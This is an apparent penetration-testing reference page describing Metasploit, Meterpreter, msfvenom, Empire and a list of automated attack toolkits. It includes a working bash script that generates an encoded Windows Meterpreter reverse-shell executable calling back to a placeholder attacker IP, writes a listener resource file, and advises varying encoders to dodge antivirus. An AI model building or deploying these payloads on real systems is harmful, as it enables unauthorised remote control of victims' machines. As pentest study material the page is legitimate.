Offensive Frameworks

Metasploit

The one offensive framework to rule them all. By far the most popular, Metasploit has become a staple for penetration testers everywhere. There are three basic components you need to know.

Modules are the exploit code and commands needed to exploit a specific vulnerability (alongside auxiliary, post and payload modules). There are thousands of them, and more are added as new exploit code is developed. For those looking to take the infamous OSCP exam, note that Metasploit is restricted: the underlying exploit code can still be used manually, but Metasploit's auto-exploitation may only be used against a single target. Check the current exam rules before relying on it.

Meterpreter is the advanced in-memory shell that ships with Metasploit. It adds a slew of commands you would not get from a plain shell, including built-in privilege escalation attempts (getsystem), file transfer and pivoting. Stock Meterpreter payloads are heavily signatured, so AV and EDR solutions detect them readily; you will need to put real effort into evasion, but it is well worth it.

msfvenom is Metasploit's payload generator and encoder. You will quickly get used to encoding everything you generate, and encoders can be chained by piping the raw output of one msfvenom run into another. Keep in mind that the encoders were built to avoid bad characters in shellcode, not to defeat modern AV/EDR; on their own they rarely evade a current engine, so a custom loader or packer is usually needed as well.
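As an added example (not code from the original page or from the Metasploit project), the script below builds the chained-encoder msfvenom pipeline described above and writes a matching multi/handler resource script. Each msfvenom stage reads the previous stage's raw shellcode from stdin (`-p -`), which is how encoders are chained. The LHOST/LPORT values and file names are assumed lab placeholders; the tools only run if msfvenom is on PATH, otherwise the commands are just printed.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: build a chained-encoder msfvenom
# command and a matching multi/handler resource file. LHOST/LPORT are assumed
# lab placeholder values, not real infrastructure.
set -eu

LHOST="${LHOST:-10.10.14.5}"   # attacker IP (assumed lab value)
LPORT="${LPORT:-4444}"
PAYLOAD="windows/meterpreter/reverse_tcp"

# Emit the pipeline that generates a staged Meterpreter payload and pushes it
# through three encoder passes. Every stage after the first reads the raw
# shellcode from stdin ("-p -"), so the arch and platform must be restated.
# Encoders exist to avoid bad characters and reshape the decoder stub;
# shikata_ga_nai is heavily signatured, so test the result against the
# target's AV/EDR in a lab before assuming it evades anything.
build_payload_cmd() {
  local out="${1:-payload.exe}"
  printf '%s' \
    "msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f raw -e x86/shikata_ga_nai -i 5" \
    " | msfvenom -p - -a x86 --platform windows -e x86/countdown -i 8 -f raw" \
    " | msfvenom -p - -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o $out"
}

# Write an msfconsole resource script that starts the handler as a
# background job (-j) without auto-interacting with the first session (-z)
# and keeps listening for further callbacks (ExitOnSession false).
write_handler_rc() {
  local rc="${1:-handler.rc}"
  cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
  printf '%s' "$rc"
}

# Print the commands, and only execute the generator when it is installed,
# so the script is safe to run on a box without Metasploit.
main() {
  local cmd rc
  cmd="$(build_payload_cmd payload.exe)"
  rc="$(write_handler_rc handler.rc)"
  echo "# payload generation:"
  echo "$cmd"
  echo "# start the listener with: msfconsole -q -r $rc"
  if command -v msfvenom >/dev/null 2>&1; then
    eval "$cmd"
  fi
}

main "$@"
```

Run the handler first (`msfconsole -q -r handler.rc`), then deliver the generated executable; the `-i` iteration counts and encoder order are arbitrary and worth varying per engagement, since an identical pipeline produces an identical decoder stub.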

Armitage: the Metasploit GUI


  • MSFVenom - The Metasploit payload generator and encoder
  • Meterpreter - The multi-function, highly flexible, self-escalating shell that ships with Metasploit

    • Mettle - The portable Meterpreter. This is a native-code implementation of Meterpreter designed for portability, embeddability and low resource usage. It runs on everything from the smallest embedded Linux targets to big iron, targets Android, iOS, macOS, Linux and Windows, and can be ported to almost any POSIX-compliant environment.

Meterpreter Post-Auth Runbook

Empire 3 is a post-exploitation framework that includes a pure-PowerShell Windows agent and is compatible with Python 3.x Linux/macOS agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptographically secure communications and a flexible architecture. Empire was an abandoned project that BC-Security has since revived, so be aware that older posts or guides about Empire may not be accurate for the current version.

PS Empire Resources

All-in-one Penetration Testing Toolkits

All-in-one Toolkits
  • Sn1per - Automated attack surface discovery and vulnerability scanning framework. The commercial edition, Sn1per Professional, is pitched as a continuous Attack Surface Management (ASM) platform; for more information, go to https://xerosecurity.com.

  • legion - Legion uses several well-known open-source tools to automatically, semi-automatically or manually enumerate the most commonly found services on the machines you need to pentest. Written by Carlos Polop, the creator of WinPEAS, LinPEAS and the HackTricks book; everything this guy makes is gold. Highest of recommendations.

  • celerystalk - celerystalk helps you automate your network scanning and enumeration process with asynchronous jobs (tasks) while retaining full control over which tools run. Super handy for stringing together all your favourite tools.

  • lscript - Lazy Script: a script for Kali Linux that automates many Wi-Fi penetration testing procedures.

  • KatanaFramework - Katana is a penetration testing framework written in Python, built on a simple and comprehensive structure for anyone to use, modify and share.

  • Osmedeus - Osmedeus lets you automatically run a collection of reconnaissance and vulnerability scanning tools against a target.

  • OWASP/Nettacker - The OWASP Nettacker project automates information gathering and vulnerability scanning and generates a report covering services, bugs, vulnerabilities, misconfigurations and other findings for a network.

  • sifter - Sifter is a fully stocked op centre for pentesters. It combines a plethora of OSINT, recon and vulnerability analysis tools in categorised modsets to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, scan for the 'blue' family of Microsoft vulnerabilities and, if unpatched, exploit them.

  • jok3r - Jok3r is a Python 3 CLI application aimed at helping penetration testers with network infrastructure and black-box web security tests.

  • Xerror - Xerror is an automated penetration testing tool that helps security professionals and non-professionals automate their pentesting tasks.

  • WinPwn - PowerShell-based recon and exploitation script with automatic proxy detection and integration.

  • axiom - The dynamic infrastructure framework for everybody. Distribute the workload of many different scanning tools across disposable cloud instances with ease, including nmap, ffuf, masscan, nuclei, meg and many more.
